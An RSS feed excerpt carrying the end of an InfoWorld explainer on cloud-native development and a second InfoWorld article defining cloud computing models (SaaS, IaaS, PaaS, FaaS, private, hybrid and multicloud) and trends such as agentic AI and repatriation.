<p class="wp-block-paragraph">Surrounding Kubernetes is a rapidly expanding ecosystem of complementary frameworks and tools. <a href="https://www.infoworld.com/article/2261159/what-is-a-service-mesh-easier-container-networking.html">Service meshes</a> like Istio and Linkerd provide fine-grained traffic management, policy enforcement, and mTLS-based security across microservices. <a href="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html">GitOps</a> platforms such as Argo CD and Flux bring declarative, version-controlled deployments to cloud-native environments. Meanwhile, projects like Crossplane turn Kubernetes into a universal control plane for cloud infrastructure, letting teams provision databases, queues, and storage through familiar Kubernetes APIs. These tools illustrate how cloud-native development now spans multiple layers: developer-focused application frameworks like Aspire at the top, and a powerful, evolving Kubernetes ecosystem underneath that keeps modern distributed applications running.</p>



<h2 class="wp-block-heading"><strong>Advantages and challenges for cloud-native development</strong></h2>



<p class="wp-block-paragraph">Cloud native has become so ubiquitous that its advantages are almost taken for granted at this point, but it’s worth reflecting on the beneficial shift the cloud native paradigm represents. Huge, monolithic codebases that saw updates rolled out once every couple of years have been replaced by microservice-based applications that can be improved continuously. Cloud-based deployments, when managed correctly, make better use of compute resources and allow companies to offer their products as SaaS or PaaS services. </p>



<p class="wp-block-paragraph">But <a href="https://www.infoworld.com/article/2337882/the-downsides-of-cloud-native-solutions.html">cloud-native deployments come with a number of challenges</a>, too:</p>



<ul class="wp-block-list">
<li><strong>Complexity and operational overhead: </strong>You’ll have noticed by now that many of the cloud-native tools we’ve discussed, like service meshes and observability tools, are needed to deal with the complexity of cloud-native applications and environments. Individual microservices are deceptively simple, but coordinating them all in a distributed environment is a big lift.</li>



<li><strong>Security: </strong>More services executing on more machines, communicating by open APIs, all adds up to a bigger attack surface for hackers. <a href="https://www.csoonline.com/article/572501/managing-container-vulnerability-risks-tools-and-best-practices.html">Containers</a> and <a href="https://www.csoonline.com/article/3618243/securing-cloud-native-applications-why-a-comprehensive-api-security-strategy-is-essential.html">APIs</a> each have their own special security needs, and a <a href="https://www.infoworld.com/article/2259477/open-policy-agent-a-general-purpose-policy-engine-for-cloud-native.html">policy engine</a> can be an important tool for imposing a security baseline on a sprawling cloud-native app. <a href="https://www.csoonline.com/article/564095/what-is-devsecops-developing-more-secure-applications.html">DevSecOps</a>, which adds security to DevOps, has become an important cloud-native development practice to try to close these gaps.</li>



<li><strong>Vendor lock-in: </strong>This may come as a surprise, since cloud-native is based on open standards and open source. But there are differences in how the big cloud and serverless providers works, and once you’ve written code with one provider in mind, <a href="https://www.infoworld.com/article/2337012/get-used-to-cloud-vendor-lock-in.html">it can be hard to migrate elsewhere</a>.</li>



<li><strong>A persistent skills gap: </strong>Cloud-native computing and development may have years under its belt at this point, but the number of developers who are truly skilled in this arena is a smaller portion of the workforce than you’d think. Companies <a href="https://www.infoworld.com/article/3484912/a-strategic-road-map-for-navigating-the-cloud-skills-shortage.html">face difficult choices in bridging this skills gap</a>, whether that’s bidding up salaries, working to upskill current workers, or allowing remote work so they can cast a wide net. </li>
</ul>



<h2 class="wp-block-heading">Cloud native in the real world</h2>



<p class="wp-block-paragraph">Cloud native computing is often associated with giants like Netflix, Spotify, Uber, and AirBNB, where many of its technologies were pioneered in the early ’10s. But the CNCF’s <a href="https://www.cncf.io/case-studies/">Case Studies page</a> provides an in-depth look at how cloud native technologies are helping companies. Examples include the following:</p>



<ul class="wp-block-list">
<li>A UK-based payment technology company that can <a href="https://www.cncf.io/case-studies/form3/">switch between data centers and clouds</a> with zero downtime</li>



<li>A software company whose product collects and analyzes data from IoT devices — and can <a href="https://www.cncf.io/case-studies/tempestive/">scale up</a> as the number of gadgets grows</li>



<li>A Czech web service company that managed to <a href="https://www.cncf.io/case-studies/seznam/">improve performance while reducing costs</a> by migrating to the cloud</li>
</ul>



<p class="wp-block-paragraph">Cloud-native infrastructure’s capability to quickly scale up to large workloads also make it an attractive platform for developing AI/ML applications: another one of those CNCF case studies looks at how IBM uses Kubernetes to <a href="https://www.cncf.io/case-studies/ibmwatsonxassistant/">train its Watsonx assistant</a>. The big three providers are putting a lot of effort into pitching their platforms as the place for you to develop your own generative AI tools, with offerings like <a href="https://www.infoworld.com/article/3608598/microsoft-rebrands-azure-ai-studio-to-azure-ai-foundry.html">Azure AI Foundry,</a><a href="https://www.infoworld.com/article/3959648/google-unveils-firebase-studio-for-ai-app-development.html">Google Firebase Studio</a>, and <a href="https://www.infoworld.com/article/2336139/amazon-bedrock-a-solid-generative-ai-foundation.html">Amazon Bedrock</a>. It seems clear that cloud native technology is ready for what comes next.</p>



<h2 class="wp-block-heading">Learn more about related cloud-native technologies:</h2>



<ul class="wp-block-list">
<li><a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">Platform-as-a-service (PaaS) explained</a></li>



<li><a href="https://www.infoworld.com/article/2238873/what-is-cloud-computing.html">What is cloud computing</a></li>



<li><a href="https://www.infoworld.com/article/2256706/what-is-multicloud-the-next-step-in-cloud-computing.html">Multicloud explained</a></li>



<li><a href="https://www.infoworld.com/article/2259475/what-is-agile-methodology-modern-software-development-explained.html">Agile methodology explained</a></li>



<li><a href="https://www.infoworld.com/article/2259487/how-to-excel-in-agile-software-development.html">Agile development best practices</a></li>



<li><a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">Devops explained</a></li>



<li><a href="https://www.infoworld.com/article/2266905/devops-best-practices-the-5-methods-you-should-adopt.html">Devops best practices</a></li>



<li><a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">Microservices explained</a></li>



<li><a href="https://www.infoworld.com/article/2253197/tutorial-how-to-build-microservices-apps.html">Microservices tutorial</a></li>



<li><a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker and Linux containers explained</a></li>



<li><a href="https://www.infoworld.com/article/2254159/how-to-get-started-with-kubernetes-2.html">Kubernetes tutorial</a></li>



<li><a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD (continuous integration and continuous delivery) explained</a></li>



<li><a href="https://www.infoworld.com/article/2268012/get-started-with-cicd-automating-application-delivery-with-cicd-pipelines.html">CI/CD best practices</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is cloud computing? From infrastructure to autonomous, agentic-driven ecosystems]]></title>
<description><![CDATA[Cloud computing continues to be the platform of choice for large applications and a driver of innovation in enterprise technology. Gartner forecasts public cloud spending alone to  the public cloud services market alone will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and...]]></description>
<link>https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h3 class="wp-block-heading"></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2337750/when-will-cloud-computing-stop-growing.html">Cloud computing</a> continues to be the <a href="https://www.cio.com/article/482179/volkswagen-drives-the-automotive-industry-cloud-forward.html">platform of choice for large applications</a> and a <a href="https://www.infoworld.com/article/2336917/cloud-computing-is-reinventing-cars-and-trucks.html">driver of innovation</a> in enterprise technology. <a href="https://www.gartner.com/en/newsroom/press-releases/2024-05-20-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-surpass-675-billion-in-2024#:~:text=Worldwide%20end-user%20spending%20on,(GenAI)%20and%20application%20modernization.">Gartner </a>forecasts public cloud spending alone to  the<a href="https://www.gartner.com/en/documents/6302015#:~:text=Summary,AI%20workloads%20and%20enterprise%20modernization."> public cloud services market alone </a>will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and enterprise modernization.</p>



<p class="wp-block-paragraph">Driving this growth are the rise of <a href="https://www.infoworld.com/article/2262333/youre-doing-cloud-based-ai-and-machine-learning-wrong.html">AI and machine learning on the cloud</a>, <a href="https://www.infoworld.com/article/2335144/what-happened-to-edge-computing.html">adoption of edge computing</a>, the maturation of <a href="https://www.infoworld.com/article/3406501/what-is-serverless-serverless-computing-explained.html">serverless computing</a>, the emergence of <a href="https://www.infoworld.com/article/3584433/are-you-ready-for-multicloud-a-checklist.html">multicloud strategies</a>, improved security and privacy, and more sustainable cloud practices.</p>



<h2 class="wp-block-heading">What is cloud computing?</h2>



<p class="wp-block-paragraph">While often used broadly, the term cloud computing is defined as an abstraction of compute, storage, and network infrastructure assembled as a platform on which applications and systems are deployed quickly and scaled on the fly.</p>



<p class="wp-block-paragraph">Most cloud customers consume <a href="https://www.cio.com/article/2097657/6-cloud-market-forces-impacting-it-strategies-today.html">public cloud </a>computing services over the internet, which are hosted in large, remote data centers maintained by cloud providers. The most common type of cloud computing, SaaS (software as service), delivers prebuilt applications to the browsers of customers who pay per seat or by usage, exemplified by such popular apps as Salesforce, Google Docs, or Microsoft Teams.</p>



<h3><strong> 5 top trends in cloud computing</strong></h3>

<ol>
<li><strong>Agentic cloud ecosystems: </strong> The shift from AI as a tool to AI as an autonomous operator within cloud environments.</li>
<li><strong>Sovereign and localized clouds: </strong> Meeting strict national data residency and digital sovereignty laws.</li>
<li><strong>Specialized AI hardware access: </strong> Navigating the GPU capacity crunch through reserved instances and boutique AI clouds.</li>
<li><strong>Integrated greenOps: </strong>Merging cost optimization with mandatory carbon-footprint reporting.</li>
<li><strong>Industry-specific walled gardens: </strong> The maturation of vertical clouds into highly regulated, precompliant environments for finance and healthcare.</li>
</ol>






<p class="wp-block-paragraph">Next in line is IaaS (infrastructure as a service), which offers vast, virtualized compute, storage, and network infrastructure upon which customers build their own applications, often with the aid of providers’ <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">API</a>-accessible services.</p>



<p class="wp-block-paragraph">When people refer to the “the cloud” today, they most often mean the big IaaS providers: AWS (Amazon Web Services), Google Cloud Platform, or Microsoft Azure. All three have become ecosystems of services that go way beyond infrastructure and include developer tools, serverless computing, machine learning services and APIs, data warehouses, and thousands of other services. With both SaaS and IaaS, a key benefit is agility. Customers gain new capabilities almost instantly without the capital investment in hardware or software on-premises — and they can instantly scale the cloud resources they consume up or down as needed.</p>



<p class="wp-block-paragraph">According to <a href="https://foundryco.com/research/cloud-computing/">Foundry’s Cloud Computing Study, 2025</a>, enterprises are moving to the cloud to improve security and/or governance, increase scalability​, accelerate adoption of artificial intelligence and machine learning and other new technologies, replace on-premises legacy technology, ​improve employee productivity, and ensure disaster recovery and business continuity.</p>



<h2 class="wp-block-heading">Hyperscalers now dominate cloud services</h2>



<p class="wp-block-paragraph">The largest cloud service providers are often described as hyperscalers, due to their capability to provide large-scale data centers across the globe. Hyperscalers typically offer a wide range of cloud services, including IaaS, PaaS, SaaS, and more.</p>



<p class="wp-block-paragraph">As mentioned above, notable hyperscalers include Amazon Web Services (AWS), Google Cloud Platform, and Microsoft Azure. They offer the following capabilities.</p>



<ul class="wp-block-list">
<li><strong>Scalability</strong>: Hyperscalers can handle massive workloads and scale resources up or down quickly.</li>



<li><strong>Cost-effectiveness</strong>: Hyperscalers often offer competitive pricing and economies of scale.</li>



<li><strong>Global reach</strong>: Hyperscalers operate data centers around the world, providing low-latency access to customers in different regions.</li>



<li><strong>Innovation</strong>: Hyperscalers are at the forefront of cloud innovation, offering new services and features.</li>
</ul>



<h3 class="wp-block-heading">Challenges of working with hyperscalers</h3>



<ul class="wp-block-list">
<li><strong>Vendor lock-in</strong>: Relying heavily on a single hyperscaler can create <a href="https://www.cio.com/article/648048/hyperscalers-in-crosshairs-for-anti-competitive-pricing-and-lock-in.html">vendor lock-in</a>, making it difficult to switch to another provider and charging large egress fees if you do move.</li>



<li><strong>Complexity</strong>: Hyperscalers offer a vast array of services, which can be overwhelming for some customers.</li>



<li><strong>Security concerns</strong>: Because hyperscalers handle sensitive data, security is a major concern.</li>
</ul>



<h2 class="wp-block-heading"><strong>AI, Agents, and the Sovereign Cloud</strong></h2>



<p class="wp-block-paragraph">The AI-enabled enterprise has moved beyond simple chatbots. The focus has shifted to <strong>agentic workflows </strong>— autonomous systems that reside in the cloud and possess the authority to execute business processes, manage cloud spend, and self-patch security vulnerabilities without human intervention.</p>



<h3 class="wp-block-heading"><strong>The shift to agentic infrastructure</strong></h3>



<p class="wp-block-paragraph">Cloud providers are no longer just selling compute. They are selling <strong>inference-as-a-service</strong>. Modern cloud budgets are now dominated by the high cost of specialized GPU clusters (such as Nvidia’s Blackwell architecture). This has led to the rise of boutique AI clouds that compete with hyperscalers by offering bare-metal access to the latest silicon specifically for model training and fine-tuning.</p>



<h3 class="wp-block-heading"><strong>Data sovereignty and private AI</strong></h3>



<p class="wp-block-paragraph">A major shift in late 2025 is the move away from public AI models for sensitive data. Organizations are increasingly using retrieval-augmented generation (RAG) within walled garden environments. This ensures that a company’s proprietary data never leaves their specific cloud instance to train a provider’s base model.</p>



<p class="wp-block-paragraph">Furthermore, sovereign AI has become a requirement for global operations. Governments now demand that the AI models processing their citizens’ data be hosted on infrastructure that is owned, operated, and governed within their own borders.</p>



<h3 class="wp-block-heading"><strong>The challenges of ghost AI</strong></h3>



<p class="wp-block-paragraph">Just as shadow IT plagued the 2010s, ghost AI—unauthorized AI agents running on corporate cloud accounts — has become a primary security risk. Managing these autonomous entities requires a new layer of <strong>AI governance</strong>, where the cloud provider automatically audits the intent and permissions of every running agent to prevent runaway costs or data leaks.</p>



<h2 class="wp-block-heading">Cloud computing definitions</h2>



<p class="wp-block-paragraph">In 2011, <a href="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-145.pdf">NIST posted a PDF</a> that divided cloud computing into three “service models” — SaaS, IaaS, and PaaS (platform as a service) — the latter being a controlled environment within which customers develop and run applications. These three categories have largely stood the test of time, although most PaaS solutions now are made available as services within IaaS ecosystems rather than as dedicated PaaS clouds.</p>



<p class="wp-block-paragraph">Two evolutionary trends stand out since NIST’s threefold definition. One is the long and growing list of subcategories within SaaS, IaaS, and PaaS, some of which blur the lines between categories. The other is the explosion of API-accessible services available in the cloud, particularly within IaaS ecosystems. The cloud has become a crucible of innovation where many emerging technologies appear first as services, a big attraction for business customers who understand the potential competitive advantages of early adoption.</p>



<h3 class="wp-block-heading"><strong>SaaS (software as a service) definition</strong></h3>



<p class="wp-block-paragraph">This type of cloud computing delivers applications over the internet, typically with a browser-based user interface. Today, most software companies offer their wares via <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS </a>— if not exclusively, then at least as an option.</p>



<p class="wp-block-paragraph">The most popular SaaS applications for business are <a href="https://www.computerworld.com/article/3570821/google-workspace-explained-googles-answer-to-microsoft-365.html">Google’s G Suite</a> and <a href="https://www.computerworld.com/article/1710782/office-2021-vs-microsoft-365-office-365-how-to-choose.html">Microsoft’s Office 365</a>. Most enterprise applications, including giant <a href="https://www.cio.com/article/272362/what-is-erp-key-features-of-top-enterprise-resource-planning-systems.html">ERP</a> suites from Oracle and SAP, come in both SaaS and on-premises versions. SaaS applications typically offer extensive configuration options as well as development environments that enable customers to code their own modifications and additions. They also enable data integration with on-prem applications.</p>



<h3 class="wp-block-heading"><strong>IaaS (infrastructure as a service) definition</strong></h3>



<p class="wp-block-paragraph">At a basic level, <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">IaaS </a>cloud providers offer virtualized compute, storage, and networking over the internet on a pay-per-use basis. Think of it as a data center maintained by someone else, remotely, but with a software layer that virtualizes all those resources and automates customers’ ability to allocate them with little trouble.</p>



<p class="wp-block-paragraph">But that’s just the basics. The full array of services offered by the major public IaaS providers is staggering: <a href="https://www.infoworld.com/article/2269279/the-era-of-the-cloud-database-has-finally-begun.html">highly scalable databases</a>, virtual private networks, <a href="https://www.infoworld.com/article/2255434/what-is-big-data-analytics-fast-answers-from-diverse-data-sets.html">big data analytics</a>, <a href="https://www.infoworld.com/article/2259367/buyers-guide-how-to-choose-a-cloud-machine-learning-platform.html">AI and machine learning services</a>, application platforms, developer tools, <a href="https://www.infoworld.com/article/3215275/what-is-devops-transforming-software-development.html">devops</a> tools, and so on. Amazon Web Services was the first IaaS provider and remains the leader, followed by <a href="https://www.infoworld.com/article/2269424/azure-cloud-services-guide-the-right-tools-for-the-job.html">Microsoft Azure</a>, <a href="https://www.infoworld.com/article/2263677/google-cloud-platform-services-guide-the-right-tools-for-the-job.html">Google Cloud Platform</a>, <a href="https://www.infoworld.com/article/2256709/ibm-cloud-services-guide-the-right-tools-for-the-job.html">IBM Cloud</a>, and <a href="https://www.infoworld.com/article/3529339/oracle-cloudworld-2024-10-key-takeaways-from-the-big-annual-event.html">Oracle Cloud</a>.</p>



<h3 class="wp-block-heading"><strong>PaaS (platform as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">PaaS</a> provides sets of services and workflows that specifically target developers, who can use shared tools, processes, and APIs to accelerate the development, testing, and deployment of applications. Salesforce’s <a href="https://www.infoworld.com/article/2257217/5-foolish-reasons-youre-not-using-heroku.html">Heroku</a> and Salesforce Platform (formerly Force.com) are popular public cloud PaaS offerings; <a href="https://www.infoworld.com/article/2258957/cloud-foundry-stages-a-comeback.html">Cloud Foundry</a> and Red Hat’s <a href="https://www.infoworld.com/article/2261552/red-hat-openshift-adds-containers-and-microservices-features-for-developers.html">OpenShift</a> can be deployed on premises or accessed through the major public clouds. For enterprises, PaaS can ensure that developers have ready access to resources, follow certain processes, and use only a specific array of services, while operators maintain the underlying infrastructure.</p>



<h3 class="wp-block-heading"><strong>FaaS (function as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256402/paas-caas-or-faas-how-to-choose.html">FaaS</a>, the original and most basic version of <a href="https://www.infoworld.com/article/2266283/serverless-in-the-cloud-aws-vs-google-cloud-vs-microsoft-azure.html">serverless computing</a>, adds another layer of abstraction to PaaS, so that developers are insulated from everything in the stack below their code. Instead of futzing with virtual servers, containers, and application runtimes, developers upload narrowly functional blocks of code, and set them to be triggered by a certain event (such as a form submission or uploaded file). All of the major clouds offer FaaS on top of IaaS: <a href="https://www.infoworld.com/article/2265897/aws-lambda-tutorial-get-started-with-serverless-computing-2.html">AWS Lambda</a>, <a href="https://www.infoworld.com/article/2255377/how-to-work-with-azure-functions-in-csharp.html">Azure Functions</a>, <a href="https://www.infoworld.com/article/2243861/google-takes-aims-at-aws-lambda-with-cloud-functions.html">Google Cloud Functions</a>, and IBM Cloud Functions. A special benefit of FaaS applications is that they consume no IaaS resources until an event occurs, reducing pay-per-use fees.</p>



<h3 class="wp-block-heading"><strong>Private cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2179737/build-your-own-private-cloud-2.html">private cloud</a> downsizes the technologies used to run IaaS public clouds into software that can be deployed and operated in a customer’s data center. As with a public cloud, internal customers can provision their own virtual resources to build, test, and run applications, with metering to charge back departments for resource consumption. For administrators, the private cloud amounts to the ultimate in data center automation, minimizing manual provisioning and management.</p>



<p class="wp-block-paragraph">VMware remains a force in the private cloud software market, but the acquisition by Broadcom has created confusion and raised concerns among some customers about potential changes in pricing, licensing, and support. This could lead some organizations to explore alternative solutions.</p>



<p class="wp-block-paragraph">OpenStack continues to be a popular open-source choice for building private clouds. It offers a flexible and customizable platform that can be tailored to specific needs. However, OpenStack can be complex to deploy and manage, and it may require significant expertise to maintain.</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/3268073/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, a container orchestration platform that has gained significant traction in recent years, is often used in conjunction with other technologies like OpenStack to build <a href="https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> applications. Red Hat OpenShift is a comprehensive cloud platform based on Kubernetes that provides a managed experience for deploying and managing <a href="https://www.infoworld.com/article/3310941/why-you-should-use-docker-and-containers.html">container</a>-based, applications.</p>



<p class="wp-block-paragraph">Many cloud providers offer their own cloud-native platforms and tools, such as <a href="https://www.networkworld.com/article/968169/aws-rolls-out-outposts-for-on-premises-hybrid-cloud.html">AWS Outposts</a>, <a href="https://www.infoworld.com/article/2253985/a-cloud-in-your-datacenter-microsoft-azure-stack-arrives.html">Azure Stack</a>, and <a href="https://www.infoworld.com/article/2257617/what-is-google-cloud-anthos-managed-kubernetes-everywhere.html">Google Cloud Anthos</a>.</p>



<p class="wp-block-paragraph">Common factors to consider when evaluating private cloud platforms include the following:</p>



<ol class="wp-block-list">
<li><strong>Pricing</strong>: The initial cost of deployment and ongoing maintenance costs.</li>



<li><strong>Complexity</strong>: The level of technical expertise needed to manage the platform.</li>



<li><strong>Flexibility</strong>: The ability to customize the platform to meet specific needs.</li>



<li><strong>Vendor lock-in</strong>: The degree to which the organization is tied to a particular vendor.</li>



<li><strong>Security</strong>: The security features and capabilities of the platform.</li>



<li><strong>Scalability</strong>: The capability to expand the platform to meet future needs.</li>
</ol>



<h3 class="wp-block-heading"><strong>Hybrid cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2257084/hybrid-cloud-private-cloud-public-cloud-multicloud-how-to-choose.html">hybrid cloud</a> is the integration of a private cloud with a public cloud. At its most developed, the hybrid cloud involves creating parallel environments in which applications can move easily between private and public clouds. In other instances, databases may stay in the customer data center and integrate with public cloud applications — or virtualized data center workloads may be replicated to the cloud during times of peak demand. The types of integrations between private and public clouds vary widely, but they must be extensive to earn a hybrid cloud designation.</p>



<h3 class="wp-block-heading"><strong>Public APIs (application programming interfaces) definition</strong></h3>



<p class="wp-block-paragraph">Just as SaaS delivers applications to users over the internet, public <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a> offer developers application functionality that can be accessed programmatically. For example, in building web applications, developers often tap into the Google Maps API to provide driving directions; to integrate with social media, developers may call upon APIs maintained by Twitter, Facebook, or LinkedIn. <a href="https://www.infoworld.com/article/2253662/get-started-with-twilios-programmable-video-api.html">Twilio</a> has built a successful business delivering telephony and messaging services via public APIs. Ultimately, any business can provision its own public APIs to enable customers to consume data or access application functionality.</p>



<h3 class="wp-block-heading"><strong>iPaaS (integration platform as a service) definition</strong></h3>



<p class="wp-block-paragraph">Data integration is a key issue for any sizeable company, but particularly for those that adopt SaaS at scale. iPaaS providers typically offer prebuilt connectors for sharing data among popular SaaS applications and on-premises enterprise applications, though providers may focus more or less on business-to-business and e-commerce integrations, cloud integrations, or traditional SOA-style integrations. iPaaS offerings in the cloud from such providers as Dell Boomi, Informatica, MuleSoft, and SnapLogic also let users implement data mapping, transformations, and workflows as part of the integration-building process.</p>



<h3 class="wp-block-heading"><strong>IDaaS (identity as a service) definition</strong></h3>



<p class="wp-block-paragraph">The most difficult security issue related to <a href="https://www.infoworld.com/article/2268884/why-cloud-computing-is-always-a-good-question.html">cloud computing</a> is managing user identity and its associated rights and permissions across data centers and pubic cloud sites. <a href="https://www.csoonline.com/article/572759/idaas-explained-how-it-compares-to-iam.html">IDaaS providers</a> maintain cloud-based user profiles that authenticate users and enable access to resources or applications based on security policies, user groups, and individual privileges. The ability to integrate with various directory services (Active Directory, LDAP, etc.) and provide single sign-on across business-oriented SaaS applications is essential.</p>



<p class="wp-block-paragraph">Leaders in IDaaS include Microsoft, IBM, Google, Oracle, Okta, Capgemini, Okta, Junio Corporation, OneLogin, and JumpCloud. <strong> </strong></p>



<h3 class="wp-block-heading"><strong>Collaboration platforms</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/3595255/slack-adds-templates-to-help-users-kick-off-projects-quicker.html">Collaboration solutions such as Slack</a> and <a href="https://www.computerworld.com/article/3593909/microsoft-combines-teams-chat-and-channels-in-ui-refresh.html">Microsoft Teams</a> have become vital messaging platforms that enable groups to communicate and work together effectively. Basically, these solutions are relatively simple SaaS applications that support chat-style messaging along with file sharing and audio or video communication. Most offer APIs to facilitate integrations with other systems and enable third-party developers to create and share add-ins that augment functionality.</p>



<h3 class="wp-block-heading"><strong>Vertical clouds</strong></h3>



<p class="wp-block-paragraph">Key providers in such industries as financial services, healthcare, retail, life sciences, and manufacturing provide PaaS clouds to enable customers to build vertical applications that tap into industry-specific, API-accessible services. Vertical clouds can dramatically reduce the time to market for vertical applications and accelerate domain-specific B2B integrations. Most vertical clouds are built with the intent of nurturing partner ecosystems.</p>



<h2 class="wp-block-heading"><strong>Other cloud computing considerations</strong></h2>



<p class="wp-block-paragraph">The most widely accepted definition of cloud computing means that you run your workloads on someone else’s servers, but this is not the same as outsourcing. Virtual cloud resources and even SaaS applications must be configured and maintained by the customer. Consider these factors when planning a cloud initiative.</p>



<h3 class="wp-block-heading"><strong>Cloud computing security considerations</strong></h3>



<p class="wp-block-paragraph">Objections to the public cloud generally begin with <a href="https://www.csoonline.com/article/555213/top-cloud-security-threats.html">cloud security</a>, although the major public clouds have proven themselves much less susceptible to attack than the average enterprise data center.</p>



<p class="wp-block-paragraph">Of greater concern is the integration of security policy and identity management between customers and public cloud providers. In addition, government regulation may forbid customers from allowing sensitive data off-premises. Other concerns include the risk of outages and the long-term operational costs of public cloud services.</p>



<h3 class="wp-block-heading"><strong>Multicloud management considerations</strong></h3>



<p class="wp-block-paragraph">To enhance their operational efficiency, reduce costs, and improve security, many companies are increasingly turning to <a href="https://www.infoworld.com/article/2335587/can-cloud-computing-be-truly-federated.html">multicloud strategies</a>. By distributing workloads across <a href="https://www.infoworld.com/article/2336303/are-the-different-public-clouds-really-that-different.html">multiple cloud providers</a>, organizations can avoid vendor lock-in, <a href="https://www.infoworld.com/article/2261783/3-cloud-architecture-patterns-that-optimize-scalability-and-cost.html">optimize costs</a>, and leverage the best-of-breed services offered by different providers.</p>



<p class="wp-block-paragraph">This multicloud approach also improves performance and reliability by minimizing downtime and optimizing latency. Additionally, multicloud strategies strengthen security by diversifying the attack surface and facilitating compliance with industry regulations. Finally, by replicating critical workloads across multiple regions and providers, companies can establish robust disaster recovery and business continuity plans, ensuring minimal disruption in the event of catastrophic failures.</p>



<p class="wp-block-paragraph">The bar to qualify as a <a href="https://www.infoworld.com/article/2256706/what-is-multicloud-the-next-step-in-cloud-computing.html">multicloud</a> adopter is low: A customer just needs to use more than one public cloud service. However, depending on the number and variety of cloud services involved, managing multiple clouds can become complex from both a cost optimization and a technology perspective.</p>



<p class="wp-block-paragraph">In some cases, customers subscribe to multiple cloud services simply to avoid dependence on a single provider. A more sophisticated approach is to select public clouds based on the unique services they offer and, in some cases, integrate them. For example, developers might want to use Google’s <a href="https://www.infoworld.com/article/2336686/google-vertex-ai-studio-puts-the-promise-in-generative-ai.html">Vertex AI Studio</a> on Google Cloud Platform to build AI-driven applications, but prefer <a href="https://www.infoworld.com/article/2260091/what-is-jenkins-the-ci-server-explained.html">Jenkins</a> hosted on the CloudBees platform for <a href="https://www.infoworld.com/article/3271126/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration</a>.</p>



<p class="wp-block-paragraph">To control costs and reduce management overhead, some customers opt for <a href="https://www.infoworld.com/article/3520828/how-cloud-custodian-conquered-cloud-resource-management.html">cloud management platforms</a> (CMPs) and/or cloud service brokers (CSBs), which let you manage multiple clouds as if they were one cloud. The problem is that these solutions tend to limit customers to such common-denominator services as storage and compute, ignoring the panoply of services that make each cloud unique.</p>



<h3 class="wp-block-heading"><strong>Edge computing considerations</strong></h3>



<p class="wp-block-paragraph">You often see <a href="https://www.networkworld.com/article/964305/what-is-edge-computing-and-how-it-s-changing-the-network.html">edge computing</a> incorrectly described as an alternative to cloud computing. Edge computing is about moving compute to local devices in a highly distributed system, typically as a layer around a cloud computing core. There is typically a cloud involved to orchestrate all of the devices and take in their data, then analyze it or otherwise act on it. </p>



<h3 class="wp-block-heading"><strong>To the cloud and back – why repatriation is real</strong></h3>



<p class="wp-block-paragraph">While public cloud offers scalability and flexibility, some enterprises are opting to <a href="https://www.infoworld.com/article/2336102/why-companies-are-leaving-the-cloud.html">return to on-premises infrastructure</a> due to rising costs, data security concerns, performance issues, vendor lock-in, and regulatory compliance challenges. While the public cloud offers scalability and flexibility, on-premises infrastructure provides greater control, customization, and potential cost savings in certain scenarios leading some technology decision-makers to <a href="https://www.infoworld.com/article/2336835/do-you-need-to-repatriate-from-the-cloud.html">consider repatriation</a>. However, a hybrid cloud approach, combining public and private cloud, often offers the best balance of benefits.</p>



<p class="wp-block-paragraph">More specific reasons to repatriate including the following:</p>



<ul class="wp-block-list">
<li>Unanticipated costs, such as data transfer fees, storage charges, and <a href="https://www.infoworld.com/article/2336430/why-public-cloud-providers-are-cutting-egress-fees.html">egress fees</a>, can quickly escalate, especially for large-scale cloud deployments.  </li>



<li>Inaccurate resource provisioning or underutilization can lead to higher-than-expected costs.</li>



<li>Stricter <a href="https://www.infoworld.com/article/3545268/why-cloud-security-outranks-cost-and-scalability.html">data privacy regulations</a> require organizations to store and process data within specific geographic boundaries.  </li>



<li>For highly sensitive data, companies may prefer to maintain greater control over security measures and access permissions. </li>



<li><a href="https://www.infoworld.com/article/2338856/cloud-may-be-overpriced-compared-to-on-premises-systems.html">On-premises infrastructure</a> can offer lower latency, particularly for applications requiring real-time processing or high-performance computing.  </li>



